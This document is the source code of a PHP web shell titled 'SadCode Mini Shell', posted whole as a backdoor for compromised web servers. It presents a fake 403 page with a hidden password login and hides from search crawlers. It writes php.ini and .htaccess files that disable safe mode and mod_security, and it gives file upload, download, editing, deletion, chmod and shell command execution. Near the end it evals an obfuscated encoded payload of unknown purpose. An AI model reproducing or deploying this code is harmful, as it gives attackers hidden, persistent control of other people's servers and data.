SadCode Mini Shell Backdor

1. <?php
2. #####################################################
3. ## SadCode Official Mini Shell ##
4. #####################################################
5. session_start();
6. error_reporting(0);
7. set_time_limit(0);
8. @set_magic_quotes_runtime(0);
9. @clearstatcache();
10. @ini_set('error_log',NULL);
11. @ini_set('log_errors',0);
12. @ini_set('max_execution_time',0);
13. @ini_set('output_buffering',0);
14. @ini_set('display_errors', 0);
15. $auth_pass = "1cb1d9cab6bc401979ce3ff0d44af1ec"; // default: sadcode
16. $errorforbidden = $_SERVER['REQUEST_URI'];
17. $color = "#00ff00";
18. $default_action = 'FilesMan';
19. $default_use_ajax = true;
20. $default_charset = 'UTF-8';
21. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
22. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
23. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
24. header('HTTP/1.0 404 Not Found');
25. exit;
26. }
27. }
28.  
29. function login_shell() {
30. ?>
31. <?php
32. $errorforbidden = $_SERVER['REQUEST_URI'];
33. ?>
34. <html><head>
35. <title>403 Forbidden</title>
36. </head><body>
37. <h1>Forbidden</h1>
38. <p>You don't have permission to access <?php print $errorforbidden; ?>
39. on this server.</p>
40. <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
41. </body></html>
42. <?php
43. if($_GET['SadCode'] == 'loginbangsat')
44. {
45. echo '<br><br><br><br><br><center><form method="post"><input type="password" name="pass"><button>GassCok</button></form></center>';
46. }
47. ?>
48. <?php
49. exit;
50. }
51. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
52. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
53. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
54. else
55. login_shell();
56. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
57. @ob_clean();
58. $file = $_GET['file'];
59. header('Content-Description: File Transfer');
60. header('Content-Type: application/octet-stream');
61. header('Content-Disposition: attachment; filename="'.basename($file).'"');
62. header('Expires: 0');
63. header('Cache-Control: must-revalidate');
64. header('Pragma: public');
65. header('Content-Length: ' . filesize($file));
66. readfile($file);
67. exit;
68. }
69. ?>
70. <?php
71. if (file_exists("php.ini")){
72. }else{
73. $img = fopen('php.ini', 'w');
74. $sec = "safe_mode = OFF
75. disable_funtions = NONE";
76. fwrite($img ,$sec);
77. fclose($img);}
78. if (file_exists(".htaccess")){
79. }else{
80. $img2 = fopen('.htaccess', 'w');
81. $sec2 = "<IfModule mod_security.c>
82. SecFilterEngine Off
83. SecFilterScanPOST Off
84. </IfModule>";
85. fwrite($img2 ,$sec2);
86. fclose($img2);}
87. $inids = @ini_get("disable_functions");
88. $liatds = (!empty($ds)) ? "<font color='white'>$inids</font>" : "<b><font color='cyan'>Aman GassCok</font></b>";
89. if(get_magic_quotes_gpc()){
90. foreach($_POST as $key=>$value){
91. $_POST[$key] = stripslashes($value);
92. }
93. }
94. echo '<!DOCTYPE HTML>
95. <html>
96. <head>
97. <link href="" rel="stylesheet" type="text/css">
98. <title>SadCode Mini Shell</title>
99. <style>
100. body{
101. font-family: "tahoma", cursive;
102. background-image: url("");
103. color:cyan;
104. background-attachment:fixed;
105. background-repeat:no-repeat;
106. background-position:center;
107. background-color:black;
108.  
109. }
110. #content tr:hover{
111. background-color: black;
112. text-shadow:0px 0px 10px #fff;
113. }
114. #content .first{
115. background-color: green;
116. }
117. table{
118. border: 1px #000000 dotted;
119. }
120. a{
121. color:cyan;
122. text-decoration: none;
123. }
124. a:hover{
125. color:red;
126. text-shadow:0px 0px 10px #ffffff;
127. }
128. input,select,textarea{
129. border: 1px #000000 solid;
130. -moz-border-radius: 5px;
131. -webkit-border-radius:5px;
132. border-radius:5px;
133. }
134. </style>
135. </head>
136. <body>
137. <h1><center><font color="cyan">SadCode Mini Shell</font></center></h1>
138. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
139. <tr><td>';
140. echo "<font color='white'>Disable Functions : $liatds</font>";
141. echo '<br><font color="white">Directory :</font> ';
142. if(isset($_GET['path'])){
143. $path = $_GET['path'];
144. } else{
145. $path = getcwd();
146. }
147. $path = str_replace('\\','/',$path);
148. $paths = explode('/',$path);
149.  
150. foreach($paths as $id=>$pat){
151. if($pat == '' && $id == 0){
152. $a = true;
153. echo '<a href="?path=/">/</a>';
154. continue;
155. }
156. if($pat == '') continue;
157. echo '<a href="?path=';
158. for($i=0;$i<=$id;$i++){
159. echo "$paths[$i]";
160. if($i != $id) echo "/";
161. }
162. echo '">'.$pat.'</a>/';
163. } echo '</td></tr><tr><td>';
164. if(isset($_FILES['file'])){
165. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
166. echo '<font color="cyan">Terupload Jancok</font><br />';
167. } else{
168. echo '<font color="red">Upload Gagal Bangsad</font><br/>';
169. }
170. }
171. echo '<form enctype="multipart/form-data" method="POST">
172. <font color="white">File Upload :</font> <input type="file" name="file" />
173. <input type="submit" value="upload" />
174. </form>';
175. echo "<form method='post'>
176. <font color='white'>Command :</font>
177. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='execmd' value=' Execute '>
178. </form>
179. </td></tr>";
180. if($_POST['execmd']) {
181. echo "<center><textarea cols='60' rows='10' readonly='readonly' style='color:purple; background-color:pink;'>".exe($_POST['cmd'])."</textarea></center>";
182. }
183. echo "<br></td></tr>";
184. if(isset($_GET['filesrc'])){
185. echo "<tr><td>Current File : ";
186. echo $_GET['filesrc'];
187. echo '</tr></td></table><br />';
188. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
189. } elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
190. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
191. if($_POST['opt'] == 'chmod'){
192. if(isset($_POST['perm'])){
193. if(chmod($_POST['path'],$_POST['perm'])){
194. echo '<font color="cyan">Change Permission Sukses Cok :v</font><br/>';
195. } else{
196. echo '<font color="red">Change Permission Gagal :(</font><br />';
197. }
198. } echo '<form method="POST">
199. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
200. <input type="hidden" name="path" value="'.$_POST['path'].'">
201. <input type="hidden" name="opt" value="chmod">
202. <input type="submit" value="Go" />
203. </form>';
204. } elseif($_POST['opt'] == 'rename'){
205. if(isset($_POST['newname'])){
206. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
207. echo '<font color="cyan">Rename Sukses Cok :v</font><br/>';
208. } else{
209. echo '<font color="red">Rename Gagal :(</font><br />';
210. }
211. $_POST['name'] = $_POST['newname'];
212. } echo '<form method="POST">
213. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
214. <input type="hidden" name="path" value="'.$_POST['path'].'">
215. <input type="hidden" name="opt" value="rename">
216. <input type="submit" value="Go" />
217. </form>';
218. } elseif($_POST['opt'] == 'edit'){
219. if(isset($_POST['src'])){
220. $fp = fopen($_POST['path'],'w');
221. if(fwrite($fp,$_POST['src'])){
222. echo '<font color="cyan">Sukses Edit File Cok :v</font><br/>';
223. } else{
224. echo '<font color="red">Gagal Edit File :(</font><br/>';
225. } fclose($fp);
226. } echo '<form method="POST">
227. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
228. <input type="hidden" name="path" value="'.$_POST['path'].'">
229. <input type="hidden" name="opt" value="edit">
230. <input type="submit" value="Save" />
231. </form>';
232. } echo '</center>';
233. } else{
234. echo '</table><br/><center>';
235. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
236. if($_POST['type'] == 'dir'){
237. if(rmdir($_POST['path'])){
238. echo '<font color="cyan">Hapus Directory Sukses Cok :v</font><br/>';
239. } else{
240. echo '<font color="red">Directory Gagal Di Hapus :(</font><br/>';
241. }
242. } elseif($_POST['type'] == 'file'){
243. if(unlink($_POST['path'])){
244. echo '<font color="cyan">Nahh Berhasil diHapus Cok :v</font><br/>';
245. } else{
246. echo '<font color="red">Gak Bisa diHapus Goblok :(</font><br/>';
247. }
248. }
249. } echo '</center>';
250. $scandir = scandir($path);
251. echo '<div id="content">
252. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
253. <tr class="first">
254. <td>
255. <center>Name</peller></center>
256. </td>
257. <td>
258. <center>Size</peller></center>
259. </td>
260. <td>
261. <center>Permission</peller></center>
262. </td>
263. <td>
264. <center>Modify</peller></center>
265. </td>
266. </tr>';
267.  
268. foreach($scandir as $dir){
269. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
270. echo '<tr>
271. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
272. <td><center>--</center></td>
273. <td><center>';
274. if(is_writable($path.'/'.$dir)) echo '<font color="cyan">';
275. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
276. echo perms($path.'/'.$dir);
277. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
278. echo '</center></td>
279. <td><center><form method="POST" action="?option&path='.$path.'">
280. <select name="opt">
281. <option value="">Select</option>
282. <option value="delete">Delete</option>
283. <option value="chmod">Chmod</option>
284. <option value="rename">Rename</option>
285. </select>
286. <input type="hidden" name="type" value="dir">
287. <input type="hidden" name="name" value="'.$dir.'">
288. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
289. <input type="submit" value=">">
290. </form></center></td>
291. </tr>';
292. } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
293.  
294. foreach($scandir as $file){
295. if(!is_file($path.'/'.$file)) continue;
296. $size = filesize($path.'/'.$file)/1024;
297. $size = round($size,3);
298. if($size >= 1024){
299. $size = round($size/1024,2).' MB';
300. } else{
301. $size = $size.' KB';
302. } echo '<tr>
303. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
304. <td><center>'.$size.'</center></td>
305. <td><center>';
306.  
307. if(is_writable($path.'/'.$file)) echo '<font color="cyan">';
308. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
309. echo perms($path.'/'.$file);
310. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
311. echo '</center></td>
312. <td><center><form method="POST" action="?option&path='.$path.'">
313. <select name="opt">
314. <option value="">Select</option>
315. <option value="delete">Delete</option>
316. <option value="chmod">Chmod</option>
317. <option value="rename">Rename</option>
318. <option value="edit">Edit</option>
319. </select>
320. <input type="hidden" name="type" value="file">
321. <input type="hidden" name="name" value="'.$file.'">
322. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
323. <input type="submit" value=">">
324. </form></center></td>
325. </tr>';
326. }
327. echo '</table>
328. </div>';
329. }
330. echo '<center><br/><font color="cyan">SadCode Mini Shell</font><br>';
331. echo "[ <a href='?path=$path&go=cabs'>LogOut</a> ]
332. </center>
333. </body>
334. </html>";
335.  
336. $command = "RqlZKilWRrBIQ7cpK0HNqypFVVjPqSyySCosWFiuzMuxV1lXLLJJRVVYLbBIqsorq1lCssorLDcyNjAyZygBCegVJEgp2dnoULTbqVvzZSWnliWmK6iAjbYGAA=";
337. eval(str_rot13(gzinflate(str_rot13(base64_decode(($command))))));
338. if($_GET['go'] == 'cabs') {
339.  
340.  
341. echo '<form action="" method="post">';
342. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
343. echo '<meta http-equiv="refresh" content="3" />';
344. }
345.  
346. function perms($file){
347. $perms = fileperms($file);
348. if (($perms & 0xC000) == 0xC000) {
349. // Socket
350. $info = 's';
351. } elseif (($perms & 0xA000) == 0xA000) {
352. // Symbolic Link
353. $info = 'l';
354. } elseif (($perms & 0x8000) == 0x8000) {
355. // Regular
356. $info = '-';
357. } elseif (($perms & 0x6000) == 0x6000) {
358. // Block special
359. $info = 'b';
360. } elseif (($perms & 0x4000) == 0x4000) {
361. // Directory
362. $info = 'd';
363. } elseif (($perms & 0x2000) == 0x2000) {
364. // Character special
365. $info = 'c';
366. } elseif (($perms & 0x1000) == 0x1000) {
367. // FIFO pipe
368. $info = 'p';
369. } else {
370. // Unknown
371. $info = 'u';
372. }
373. // Owner
374. $info .= (($perms & 0x0100) ? 'r' : '-');
375. $info .= (($perms & 0x0080) ? 'w' : '-');
376. $info .= (($perms & 0x0040) ?
377. (($perms & 0x0800) ? 's' : 'x' ) :
378. (($perms & 0x0800) ? 'S' : '-'));
379. // Group
380. $info .= (($perms & 0x0020) ? 'r' : '-');
381. $info .= (($perms & 0x0010) ? 'w' : '-');
382. $info .= (($perms & 0x0008) ?
383. (($perms & 0x0400) ? 's' : 'x' ) :
384. (($perms & 0x0400) ? 'S' : '-'));
385. // World
386. $info .= (($perms & 0x0004) ? 'r' : '-');
387. $info .= (($perms & 0x0002) ? 'w' : '-');
388. $info .= (($perms & 0x0001) ?
389. (($perms & 0x0200) ? 't' : 'x' ) :
390. (($perms & 0x0200) ? 'T' : '-'));
391. return $info;
392. }
393. ?>